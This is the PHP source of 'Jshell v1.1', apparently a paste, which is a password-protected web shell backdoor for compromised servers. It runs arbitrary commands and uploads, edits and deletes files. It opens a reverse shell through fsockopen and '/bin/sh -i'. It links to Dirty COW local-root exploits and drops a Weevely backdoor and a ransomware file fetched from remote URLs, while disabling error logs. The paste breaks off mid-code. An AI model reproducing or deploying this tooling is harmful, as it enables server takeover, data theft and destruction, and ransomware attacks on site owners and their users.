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Jun 9th, 2018
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  1. <?php
  2. /**
  3. * [ Jshell v1.1 - 2018. ]
  4. *
  5. * @author shutdown57 ( alinko ) < >
  6. * @version 1.0 2018
  7. * @link page :
  8. * @link group :
  9. * @see ( justalinko )
  10. * @see ( shutdown57 )
  11. * @copyright &copy; 2018 JavCode.
  12. *
  13. **/
  14. $config = [
  15. 'title' => 'Jshell v1.1', // set title name.
  16. 'debug' => true, // if debug true is any error showed.
  17. 'icon' => '',
  18. 'src_jquery' => '',
  19. 'src_datatables' => '',
  20. 'src_style' => '',
  21. ];
  23. Class Jshell{
  24. public $menubar;
  25. public $src_link;
  26. public $password;
  27. public function __construct()
  28. {
  29. /** The script started here. **/
  30. $this->password = 'w'; // password
  32. if($config['debug'] === true)
  33. { error_reporting(-1); }else{ error_reporting(0); }
  34. error_log(0);
  35. session_start();
  36. ob_start();
  37. set_time_limit(0);
  38. @ini_set('error_log',NULL);
  39. @ini_set('log_errors',0);
  40. @ini_set('max_execution_time',0);
  41. @ini_set('output_buffering',0);
  42. @ini_set('display_errors', 0);
  44. // login authetication
  45. if(empty($_SESSION['jshell']))
  46. {
  47. echo "<center><h3>Jshellv1 - 2018</h3><form method=post><input type=password name=passw placeholder=password><input type=submit value=Go></form></center>";
  48. if(isset($_POST['passw']))
  49. {
  50. if($_POST['passw'] == $this->password)
  51. {
  52. $_SESSION['jshell'] = true;
  53. echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";
  54. }
  55. }
  56. exit;
  57. }
  59. $GLOBALS['getfullpath'] = (empty($_GET['jshell_path'])) ? getcwd() : $_GET['jshell_path'];
  60. @chdir($GLOBALS['getfullpath']);
  61. $baselink = "?jshell_path=".$GLOBALS['getfullpath']."&jshell_act=";
  62. $this->menubar = [
  63. 'Home' => $_SERVER['PHP_SELF'],
  64. 'Upload' => $baselink.'upl',
  65. 'Command' => $baselink.'cmd',
  66. 'Localroot' => $baselink.'lc',
  67. 'Back Connect' => $baselink.'net',
  68. 'PHP' => $baselink.'php',
  69. 'Weevely' => $baselink.'wev',
  70. 'Ransomware' => $baselink.'rans',];
  72. $this->src_link = [
  73. 'adminer' => '',
  74. 'weevely' => '',
  75. 'mailer' => '',
  76. 'lc' => [
  77. 'dirty' => '',
  78. 'c0w' => '',
  79. 'cowroot' => '',
  80. ],
  81. 'ransomware' => '',
  82. ];
  85. }
  86. public function Jcmd($cmd) {
  87. if(function_exists('system')) {
  88. @ob_start();
  89. @system($cmd);
  90. $exect = @ob_get_contents();
  91. @ob_end_clean();
  92. return $exect;
  93. } elseif(function_exists('exec')) {
  94. @exec($cmd,$results);
  95. $exect = "";
  96. foreach($results as $result) {
  97. $exect .= $result;
  98. } return $exect;
  99. } elseif(function_exists('passthru')) {
  100. @ob_start();
  101. @passthru($cmd);
  102. $exect = @ob_get_contents();
  103. @ob_end_clean();
  104. return $exect;
  105. } elseif(function_exists('shell_exec')) {
  106. $exect = @shell_exec($cmd);
  107. return $exect;
  108. }
  109. }
  110. public function Jgetgrowif()
  111. {
  112. if(!function_exists('posix_getegid')) {
  113. $user = @get_current_user();
  114. $uid = @getmyuid();
  115. $gid = @getmygid();
  116. $group = "?";
  117. } else {
  118. $uid = @posix_getpwuid(posix_geteuid());
  119. $gid = @posix_getgrgid(posix_getegid());
  120. $user = $uid['name'];$uid = $uid['uid'];
  121. $group = $gid['name'];$gid = $gid['gid'];
  122. }
  123. $r = ['user' => $user,'uid' => $uid,'group' => $group,'gid' => $gid];
  124. return $r;
  125. }
  126. public function Jserverinfo()
  127. {
  128. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  129. $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  130. $wget = ($this->Jcmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  131. $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  132. $perl = ($this->Jcmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  133. $python = ($this->Jcmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  134. $bash = ($this->Jcmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  135. $gcc = ($this->Jcmd('gcc --help')) ? "<font color=lime>YES</font>" :"<font color=red>NO</font>";
  136. $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  137. $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'),100,"\n",true) : "<font color=red>NO !</font>";
  138. $sysfo = [
  139. 'hostname' => $_SERVER['HTTP_HOST'],
  140. 'system' => php_uname(),
  141. 'phpv' => phpversion(),
  142. 'software' => $_SERVER['SERVER_SOFTWARE'],
  143. 'ipserver' => gethostbyname($_SERVER['HTTP_HOST']),
  144. 'ipclient' => $_SERVER['REMOTE_ADDR'],
  145. 'mysql' => $mysql,
  146. 'mysqli' => $mysqli,
  147. 'wget' => $wget,
  148. 'curl' => $curl,
  149. 'perl' => $perl,
  150. 'python' => $python,
  151. 'bash' => $bash,
  152. 'gcc' => $gcc,
  153. 'safemode' => $sm,
  154. 'disafunc' => $df];
  155. return $sysfo;
  156. }
  157. public function Jcurdir($path,$goto){
  158. $dir = str_replace("\\","/",$path);
  159. $dir = explode("/",$dir);
  160. foreach($dir as $o=>$i){
  161. if($i == "" && $o == 0){
  162. echo "<a href=\"javascript:menuklik('?".$goto."=/')\">/</a>";continue;}
  163. if($i == "")continue;
  164. echo "<a href=\"javascript:menuklik('?".$goto."=";
  165. for($p=0;$p<=$o;$p++){
  166. echo $dir[$p]; if($p != $o){
  167. echo "/";} } echo "')\">".$i."</a>/";}
  168. if(is_writable($path)){echo "- [<b><font color=lime>W</font></b>]";}elseif(is_readable($path)){echo "- [<b><font color=red>R</font></b>]";}else{echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}}
  169. public function Jcaller($url,$name)
  170. {
  171. $fp = fopen($name,"w");
  172. $co = file_get_contents($url);
  173. return fwrite($fp,$co);
  174. fclose($fp);
  175. }
  176. public function Jheader($config = array())
  177. {
  178. ?>
  179. <!DOCTYPE html>
  180. <html>
  181. <head>
  182. <title><?=$config['title'];?> [<?=$_SERVER['HTTP_HOST'];?>]</title>
  183. <meta charset="utf-8">
  184. <meta name="author" content="shutdown57">
  185. <link rel="icon" type="text/css" href="<?=$config['icon'];?>">
  186. <script type="text/javascript" src="<?=$config['src_jquery'];?>"></script>
  187. <script type="text/javascript" src="<?=$config['src_datatables'];?>"></script>
  188. <!-- <link rel="stylesheet" type="text/css" href="valid/assets/css/w3.css"> -->
  189. <link rel="stylesheet" type="text/css" href="<?=$config['src_style'];?>">
  190. <script type="text/javascript">
  191. function select_all(pilih)
  192. {
  193. var cek = document.getElementsByName('pilih[]');
  194. for (var i =0; n=cek.length;i++) {
  195. cek[i].checked = pilih.checked;
  196. }
  197. }
  198. function logout()
  199. {
  200. $.ajax({
  201. url:'?jshell_act=logout',
  202. success:function(e)
  203. {
  204. alert('Bye Boyz!');
  205. window.location.href='';
  206. }
  207. });
  208. }
  209. function menuklik(uri)
  210. {
  211. $('.right').html("<img src='' style='width:50px;height:50px;'>");
  212. history.pushState(null,null,uri);
  213. $.ajax({
  214. url:uri,
  215. success:function(e)
  216. {
  217. $('body').html(e);
  218. },error:function(e)
  219. {
  220. alert('Something wrong :D '+e);
  221. }
  222. });
  223. }
  224. function rename(dir,file)
  225. {
  226. var newname = prompt('New name');
  227. if(newname != null){
  228. window.location.href='?jshell_path='+dir+'&jshell_file='+file+'&n='+newname+'&jshell_act=ren';
  229. }else{
  230. alert('Nama file masih kosong');
  231. }
  232. }
  233. function hs(l,p)
  234. {
  235. document.getElementById(l).style.display='none';
  236. document.getElementById(p).style.display='block';
  237. }
  238. function gotodir(dir)
  239. {
  240. var dire = $(dir).val();
  241. $.ajax({
  242. url:'?jshell_path='+dire,
  243. success:function(e)
  244. {
  245. $('body').html(e);
  246. history.pushState(null,null,'?jshell_path='+dire);
  247. },error:function(e)
  248. {
  249. alert('error '+e);
  250. }
  251. });
  252. }
  253. $(document).ready(function()
  254. {
  255. $('body').hide().fadeIn(500);
  256. $('#filemanager').DataTable({
  257. 'bSort':false,
  258. });
  259. });
  260. </script>
  261. </head>
  262. <body onload="faded(this)">
  263. <div class="w3-container">
  265. <header>
  266. <div class="right"></div>
  267. <table class="table" style="width: 98%;margin: 0 auto;border-left: 1px dashed #eee;border-right: 1px dashed #f00;border-top: 1px dashed #f00;border-bottom: 1px dashed #eee;">
  268. <tr><td style="width: 200px;" class="kiri"><center><img src="" style="max-width: 170px;max-height:170px;" ><p><?=$config['title'];?> | by : JavCode.</p></center></td><td>
  269. <pre>
  270. System : <?=$this->Jserverinfo()['system'];?> [Exploit-DB] [Search Localroot]
  271. Hostname : <?=$this->Jserverinfo()['hostname'];?> | Safe Mode : <?=$this->Jserverinfo()['safemode'];?> .
  272. Server Software : <?=$this->Jserverinfo()['software'];?>.
  273. PHP Version : <?=$this->Jserverinfo()['phpv'];?> - [<a href="javascript:menuklik('?jshell_path=<?=$GLOBALS[getfullpath]?>&jshell_act=phpinfo');">phpinfo</a>] [<a href="javascript:menuklik('?jshell_path=<?=dirname(php_ini_loaded_file());?>&jshell_file=<?=basename(php_ini_loaded_file());?>&jshell_act=view');">php.ini</a>]
  274. IP Server : <?=$this->Jserverinfo()['ipserver'];?> | IP Client : <?=$this->Jserverinfo()['ipclient'];?>.
  275. HDD : 31.89 / 180.16 GB | [ Free : 148.27 GB ]
  276. User : <?=$this->Jgetgrowif()['user'];?> [<?=$this->Jgetgrowif()['uid'];?>] || Group : <?=$this->Jgetgrowif()['group'];?> [<?=$this->Jgetgrowif()['gid'];?>]
  277. MySQL : <?=$this->Jserverinfo()['mysql'];?> | MySQLi : <?=$this->Jserverinfo()['mysqli'];?> | Wget : <?=$this->Jserverinfo()['wget'];?> | CURL : <?=$this->Jserverinfo()['curl'];?> | Perl : <?=$this->Jserverinfo()['perl'];?> | Python : <?=$this->Jserverinfo()['python'];?> | Bash : <?=$this->Jserverinfo()['bash'];?> | GCC ( compiler ) : <?=$this->Jserverinfo()['gcc'];?>.
  278. Disable functions : <?=$this->Jserverinfo()['disafunc'];?>
  279. </pre>
  280. </td>
  281. </tr>
  282. </table>
  283. <div style="margin-left:10px;margin: 4px;">
  284. <div id="cd">
  285. <a href="javascript:hs('cd','dc');">Current dir</a> :: <?= $this->Jcurdir($GLOBALS['getfullpath'],'jshell_path');?>
  286. </div>
  287. <div id="dc" style="display: none;">
  288. <label>Go to dir :: </label>
  289. <input type="text" id="gtd" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="button" value=">>" onclick="gotodir('#gtd')" class="submit_m">
  290. </div>
  291. </div>
  292. <ul align=center>
  293. <?php
  294. foreach($this->menubar as $menu=>$link){
  295. echo '<li>[<a href="#" onclick="menuklik(\''.$link.'\');" >'.$menu.'</a>]</li>';
  296. }
  297. ?>
  298. [<a href="#" onclick="logout()"><font color=red>Logout</font></a>]
  299. </ul>
  300. </header><br/><br/>
  301. <h1></h1>
  302. <?php
  303. }
  304. public function Jsdir($dir)
  305. {
  306. // Check if scandir() exist in server.
  307. if(function_exists('scandir'))
  308. {
  309. $s = scandir($dir);
  310. }
  311. return $s;
  312. }
  313. public function Jgetfsize($files) // function for get file size.
  314. {
  315. $size = filesize($files)/1024;
  316. $size = round($size,3);
  317. if($size > 1024){
  318. $size = round($size/1024,2). 'MB';
  319. } else {
  320. $size = $size. 'KB';}
  321. return $size;
  322. }
  323. public function Jgetmime($files) // function for get mime content type
  324. {
  325. if(function_exists('mime_content_type'))
  326. {
  327. if(is_readable($files)){
  328. $mime =mime_content_type($files);
  329. }else{
  330. $mime = "Unknown";
  331. }
  332. }else{
  333. if(is_file($files))
  334. {
  335. $mime = "Files";
  336. }elseif (is_dir($files)) {
  337. $mime = "Directory";
  338. }else{
  339. $mime = "Unknown";
  340. }
  341. }
  342. return $mime;
  343. }
  344. public function Jvf($f){
  345. $file = wordwrap(file_get_contents($f),150,"\n",true);
  346. $a= highlight_string($file,true);
  347. $old = array("0000BB","000000","FF8000","DD0000", "007700");
  348. $new = array("F73D80","e1e1e1", "05f6fa", "F9FF00" , "1dff1b");
  349. $a= str_ireplace($old,$new, $a);
  350. $result = "<div class=\"code\">";$result .= $a;$result.="</div>";
  351. return $result;}
  352. public function Jdel($dir){
  353. if(is_dir($dir)){
  354. if(!rmdir($dir)){
  355. $s=scandir($dir);
  356. foreach ($s as $ss) {
  357. if(is_file($dir."/".$ss)){
  358. if(unlink($dir."/".$ss)){
  359. $rm=rmdir($dir);
  360. }
  361. }
  362. if(is_dir($dir."/".$ss)){
  363. $rm=rmdir($dir."/".$ss);
  364. $rm.=rmdir($dir);
  365. }
  366. }
  367. }elseif(is_file($dir)){
  368. $rm = unlink($dir);
  369. }
  370. }elseif(is_file($dir))
  371. {
  372. $rm = unlink($dir);
  373. }
  374. return $rm;
  375. }
  376. public function Jupl($a,$b){
  377. if(function_exists('move_uploaded_file')){
  378. $upl = move_uploaded_file($a,$b);
  379. }elseif (function_exists('copy')) {
  380. $upl = copy($a,$b);
  381. }
  382. return $upl;
  383. }
  384. public function array_upload($file){
  385. $file_ary = array();
  386. $file_count = count($file['name']);
  387. $file_key = array_keys($file);
  388. for($i=0;$i<$file_count;$i++) {
  389. foreach($file_key as $val) {
  390. $file_ary[$i][$val] = $file[$val][$i];
  391. }
  392. }
  393. return $file_ary;
  394. }
  395. public function Jgetdmod($files) // function for get date modified.
  396. {
  397. $a_fdm=@date("d-m-Y H:i:s", filemtime($files));
  398. return $a_fdm;
  399. }
  400. public function Jgetowner($path){
  401. if(function_exists('posix_getpwuid')) {
  402. $downer = @posix_getpwuid(fileowner($path));
  403. $downer = $downer['name'];
  404. } else {
  405. $downer = fileowner($path);
  406. }
  407. return $downer;
  408. }
  409. public function Jgetgroup($path){
  410. if(function_exists('posix_getgrgid')) {
  411. $dgrp = @posix_getgrgid(filegroup($path));
  412. $dgrp = $dgrp['name'];
  413. } else {
  414. $dgrp = filegroup($path);
  415. }
  416. return $dgrp;}
  417. public function Jwrite($fname,$content)
  418. {
  419. $fp = fopen($fname,'w');
  420. fwrite($fp,$content);
  421. fclose($fp);
  422. }
  423. public function Jgetperms($file){
  424. $perms = fileperms($file);
  425. if (($perms & 0xC000) == 0xC000) {
  426. $info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}
  428. public function Jgetact($dir,$file)
  429. {
  430. $act_files = [
  431. 'delete' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=del',
  432. 'edit' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=edit',
  433. 'download' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=dl',
  434. ];
  435. $act_dirs = [
  436. 'delete' => '?jshell_path='.$dir.'&jshell_act=del',
  437. ];
  438. $a ='| ';
  439. if(is_file($dir.'/'.$file))
  440. {
  441. foreach($act_files as $val=>$link)
  442. {
  443. $getap = explode("jshell_act=",$link);
  444. $getap= $getap[1];
  445. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  446. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  447. }
  448. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename file : '.$file.'">rename</a> | ';
  449. }elseif(is_dir($dir.'/'.$file))
  450. {
  451. foreach($act_dirs as $val=>$link)
  452. {$getap = explode("jshell_act=",$link);
  453. $getap= $getap[1];
  454. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  455. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  456. }
  457. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename dir : '.$file.'">rename</a> | ';
  458. }
  459. return $a;
  460. }
  461. public function Jtitle($text)
  462. {
  463. echo "<center><h3 class=\"titleac\">..:: ".$text." ::..</h3></center><br/>";
  464. }
  465. public function Jfileman($path)
  466. {
  467. ?>
  468. <form method="post">
  469. <table class="a_exp" id="filemanager" style="margin-top: 0px">
  470. <thead>
  471. <tr><th><input type="checkbox" name="pilih[]" onclick="select_all(this)"></th>
  472. <th>Files</th>
  473. <th>Size</th>
  474. <th>Type</th>
  475. <th>Date Modif</th>
  476. <th>Owner:Group</th>
  477. <th>Permission</th>
  478. <th>Action</th>
  479. </tr>
  480. </thead>
  481. <tbody>
  482. <tr><td></td><td><a href="#" onclick="menuklik('?jshell_path=<?=dirname($GLOBALS['getfullpath']);?>')"><< Parent directory</a></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
  483. <?php
  484. /* Scan directory in server */
  485. $sdirs = $this->Jsdir($path);
  486. foreach($sdirs as $sd)
  487. {if(is_file($path.'/'.$sd)||$sd == '.'||$sd == '..')continue;
  488. ?><tr>
  489. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sd;?>"></td>
  490. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path.'/'.$sd;?>')"><?=$sd;?></a></td>
  491. <td><?=$this->Jgetfsize($path.'/'.$sd);?></td>
  492. <td><?=$this->Jgetmime($path.'/'.$sd);?></td>
  493. <td><?=$this->Jgetdmod($path.'/'.$sd);?></td>
  494. <td><?=$this->Jgetowner($path.'/'.$sd);?>:<?=$this->Jgetgroup($path.'/'.$sd);?></td>
  495. <td><?=$this->Jgetperms($path.'/'.$sd);?></td>
  496. <td><?=$this->Jgetact($path,$sd);?></td>
  498. </tr>
  499. <?php
  500. }
  501. /* scan files in server */
  502. $sfile = $this->Jsdir($path);
  503. foreach($sfile as $sf)
  504. {if(is_dir($path.'/'.$sf)||$sf == '.'||$sf == '..')continue;
  505. ?><tr>
  506. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sf;?>"></td>
  507. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path;?>&jshell_file=<?=$sf;?>&jshell_act=view')"><?=$sf;?></a></td>
  508. <td><?=$this->Jgetfsize($path.'/'.$sf);?></td>
  509. <td><?=$this->Jgetmime($path.'/'.$sf);?></td>
  510. <td><?=$this->Jgetdmod($path.'/'.$sf);?></td>
  511. <td><?=$this->Jgetowner($path.'/'.$sf);?>:<?=$this->Jgetgroup($path.'/'.$sf);?></td>
  512. <td><?=$this->Jgetperms($path.'/'.$sf);?></td>
  513. <td><?=$this->Jgetact($path,$sf);?></td>
  515. </tr>
  516. <?php
  517. }
  518. ?>
  519. </tbody>
  520. </table><div style="clear: both; margin-bottom:69px"></div><table style="bottom: 0;left: 0;position: fixed;"><tr><td>
  521. Actions</td><td><select name="actionx" class="input_m">
  522. <option>----[ action ]----</option>
  523. <option value="delete">Delete</option>
  524. <?php
  525. if(empty($_SESSION['cfile'])){
  526. ?>
  527. <option value="copy">Copy</option>
  528. <?php
  529. }else{
  530. ?><option value="paste">Paste</option><?php
  531. }
  532. ?>
  533. </select><input type="submit" name="sac" value=">>" class="submit_m">
  534. </td></tr></table>
  535. </form>
  536. <?php
  537. if(isset($_POST['sac']))
  538. {
  539. if($_POST['actionx'] == 'delete')
  540. {
  541. foreach($_POST['pilih'] as $dfil)
  542. {
  543. if($this->Jdel($dfil))
  544. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  545. else
  546. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  547. }
  548. }elseif($_POST['actionx'] == 'copy')
  549. {
  550. $_SESSION['cfile'] = $_POST['pilih'];
  551. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  552. }elseif($_POST['actionx'] == 'paste')
  553. {
  554. foreach($_SESSION['cfile'] as $paste)
  555. {
  556. copy($paste,$GLOBALS['getfullpath'].'/'.basename($paste));
  557. }
  558. unset($_SESSION['cfile']);
  559. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  560. }
  561. }
  562. }
  564. public function Jshell_act($type,$text = null)
  565. {
  566. if($type == 'cmd')
  567. {
  568. ?>
  569. <form method="post">
  570. <label>jshellv1.1 ~ $</label>
  571. <input type="text" name="cmd" class="input_m" style="width: 500px;"><input type="submit" name="exec" value=">>" class="submit_m">
  572. </form>
  573. <?php
  574. }elseif($type == 'upl')
  575. {
  576. ?>
  577. <center>
  578. <form method="post" enctype="multipart/form-data">
  579. <label>Select file ::</label>
  580. <input type="file" name="jfilez[]" class="input_m" multiple="">
  581. <label>Upload to ::</label>
  582. <input type="text" name="jdirz" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="submit" name="upload" value="Upload !" class="submit_m">
  583. </form>
  584. </center>
  585. <?php
  586. }elseif ($type == 'edit') {
  587. ?>
  588. <center>
  589. <form method="post">
  590. <textarea class="txtarea_m" name="editfile"><?=$text;?></textarea>
  591. <br/>
  592. <input type="submit" name="save" value="Save" class="submit_m" style="padding: 10px;width: 200px;cursor: pointer;">
  593. </form>
  594. </center>
  595. <?php
  596. }elseif($type == 'lc')
  597. {
  598. ?>
  599. <center>
  600. <form method="get" action="" target="_blank">
  601. <label for="q">Search on google</label>
  602. <input type="text" name="q" placeholder="Search exploit" class="input_m">
  603. <input type="submit" value=">>" class="submit_m">
  604. </form>
  605. <br>
  606. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=c0w');">c0w</a>]
  607. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=cowroot');">cowroot</a>]
  608. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=dirtycow-mem');">dirty-mem</a>]
  609. [<a href="" target="_blank">localroot ex-db</a>]
  610. </center>
  611. <?php
  612. }elseif($type == 'bc')
  613. {
  614. ?><center>
  615. <form method="post">
  616. <label for="ip">IP </label>
  617. <input type="text" name="ip" class="input_m" value="<?=$_SERVER['REMOTE_ADDR'];?>">
  618. <label for="port">Port</label>
  619. <input type="text" name="port" class="input_m" value="5758">
  620. <input type="submit" name="sbmt" value=">>" class="submit_m">
  621. </form>
  622. </center>
  623. <?php
  624. }elseif ($type == 'php') {
  625. ?>
  626. <center>
  627. <form method="post">
  628. <textarea class="txtarea_m" name="code">echo "hello noob";</textarea><br>
  629. <input type="submit" name="sbmt" value="Run !" class="submit_m" style="width: 120px">
  630. </form>
  631. </center>
  632. <?php
  633. }
  634. }
  636. }
  639. $js = new Jshell;
  641. $js->Jheader($config);
  642. if(empty($_GET['jshell_act']))
  643. {
  644. $js->Jfileman($GLOBALS['getfullpath']);
  645. }else{
  646. //000000000000000000000000000000
  647. $jfilez = @$_GET['jshell_file'];
  648. $jpaptt = @$_GET['jshell_path'];
  649. //000000000000000000000000000000
  650. if($_GET['jshell_act'] == 'del')
  651. {
  652. $delt = (empty($jfilez)) ? $jpaptt : $jpaptt.'/'.$jfilez;
  653. if($js->Jdel($delt)){
  654. echo "<b> Successfully deleted files ~ </b>";
  655. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  656. }else{
  657. echo $delt."<br/>";
  658. echo "<b> Failed delete files ~ </b>";
  659. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  661. }
  662. }elseif ($_GET['jshell_act'] == 'ren') {
  663. $fold = $jpaptt.'/'.$jfilez;
  664. $fnew = $jpaptt.'/'.$_GET['n'];
  665. if(@rename($fold,$fnew))
  666. {
  667. echo "<b> Successfully rename files ~ </b>";
  668. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  669. }else{
  670. echo "<b> Failed rename files ~ </b>";
  671. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  672. }
  674. }
  675. elseif($_GET['jshell_act'] == 'edit')
  676. {
  677. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  678. $js->Jtitle('Edit file');
  679. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  680. $js->Jshell_act('edit',htmlspecialchars(file_get_contents($jpaptt.'/'.$jfilez)));
  681. if(isset($_POST['save']))
  682. {
  683. $fp = $jpaptt.'/'.$jfilez;
  684. $content = $_POST['editfile'];
  685. if($js->Jwrite($fp,$content))
  686. {
  687. echo "<b> Successfully Edit files ~ </b>";
  688. }else{
  689. echo "<b>Failed Edit files ~ </b>";
  690. }
  691. }
  692. }
  693. elseif ($_GET['jshell_act'] == 'view') {
  694. $js->Jtitle('View file');
  695. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  696. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  697. echo $js->Jvf($jpaptt.'/'.$jfilez);
  698. }
  699. elseif($_GET['jshell_act'] == 'logout')
  700. {
  701. session_destroy();
  702. }elseif ($_GET['jshell_act'] == 'cmd') {
  703. $js->Jtitle('Command Shell');
  704. $js->Jshell_act('cmd');
  705. if(isset($_POST['exec'])){
  706. echo "<pre class='code'>";
  707. echo $js->Jcmd($_POST['cmd']);
  708. echo "</pre>";
  709. }
  710. }elseif($_GET['jshell_act'] == 'upl')
  711. {
  712. $js->Jtitle('Uploader');
  713. $js->Jshell_act('upl');
  714. if(isset($_POST['upload'])){
  715. echo "<pre class='code'>";
  716. $file_up = $js->array_upload($_FILES['jfilez']);
  717. foreach($file_up as $filup){
  718. if($js->Jupl($filup['tmp_name'],$_POST['jdirz']."/".$filup['name'])){
  719. $res_upl.="Successfuly Upload file : ".$_POST['jdirz']."/".$filup['name'];
  720. }else{
  721. $res_upl.="Failed to upload file !";}
  722. }
  723. echo $res_upl."<br/></pre>";
  724. }
  725. }elseif ($_GET['jshell_act'] == 'wev') {
  726. $js->Jtitle('Weevely remote shell backdoor');
  727. if($js->Jcaller($js->src_link['weevely'],'Jweevely.php'))
  728. {
  729. echo "<center><b>Successfuly called <a href='Jweevely.php' target='_blank'>Jweevely.php</a> !!</b><br/>";
  730. echo "<p>password :: jshellv1 ,<br/> open your terminal and remote weevely :D </p>";
  731. echo "<pre>$ weevely http://".$_SERVER['HTTP_HOST']."/".dirname($_SERVER['PHP_SELF'])."/Jweevely.php jshellv1 </pre>";
  732. }else{
  733. echo "request failed";
  734. }
  736. }elseif ($_GET['jshell_act'] == 'lc') {
  737. $js->Jtitle('Localroot');
  738. $js->Jshell_act('lc');
  739. }elseif($_GET['jshell_act'] == 'net')
  740. {
  741. $js->Jtitle('BackConnect');
  742. $js->Jshell_act('bc');
  743. if(isset($_POST['sbmt']))
  744. {
  745. $sock=fsockopen($_POST['ip'],$_POST['port']);
  746. if($sock)
  747. {
  748. echo "<center>Connection estabilished~</center> <br>";
  749. }else{
  750. echo "<center>Connection failed</center><br>";
  751. }
  752. $js->cmd("/bin/sh -i <&3 >&3 2>&3");
  753. }
  754. }elseif($_GET['jshell_act'] == 'rans')
  755. {
  756. $js->Jtitle('Ransomware ');
  757. if($js->Jcaller($js->src_link['ransomware'],'s57rsw.php'))
  758. {
